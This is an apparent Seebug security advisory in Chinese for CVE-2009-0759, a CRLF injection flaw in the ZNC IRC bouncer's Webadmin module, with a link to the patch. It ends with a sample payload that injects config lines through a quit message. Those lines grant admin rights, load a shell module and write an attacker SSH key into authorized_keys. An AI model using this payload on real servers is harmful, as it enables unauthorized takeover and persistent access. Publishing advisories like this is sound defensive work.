ZNC Webadmin模块回车换行符注入漏洞

2009-03-05T00:00:00
ID SSV:4869
Type seebug
Reporter Root
Modified 2009-03-05T00:00:00

Description

BUGTRAQ ID: 33899 CVE(CAN) ID: CVE-2009-0759

ZNC是一个IRC代理,允许用户从工作站登录到IRC服务器。

ZNC的Webadmin模块中存在多个回车换行符注入(CRLF)漏洞。通过认证的远程攻击者可以修改znc.conf配置文件并在quit消息中注入CRLF序列导致以提升的权限执行任意代码。

ZNC < 0.066 厂商补丁:

ZNC

目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

<a href=http://downloads.sourceforge.net/znc/znc-0.066.tar.gz?use_mirror=garr target=_blank rel=external nofollow>http://downloads.sourceforge.net/znc/znc-0.066.tar.gz?use_mirror=garr</a>

                                        
                                            
                                                Some quit message
  Admin = true
  LoadModule = shell
  &lt;/User&gt;
  ISpoofFile = /home/&lt;user&gt;/.ssh/authorited_keys
  ISpoofFormat = &lt;some ssh key&gt;
  &lt;User a&gt;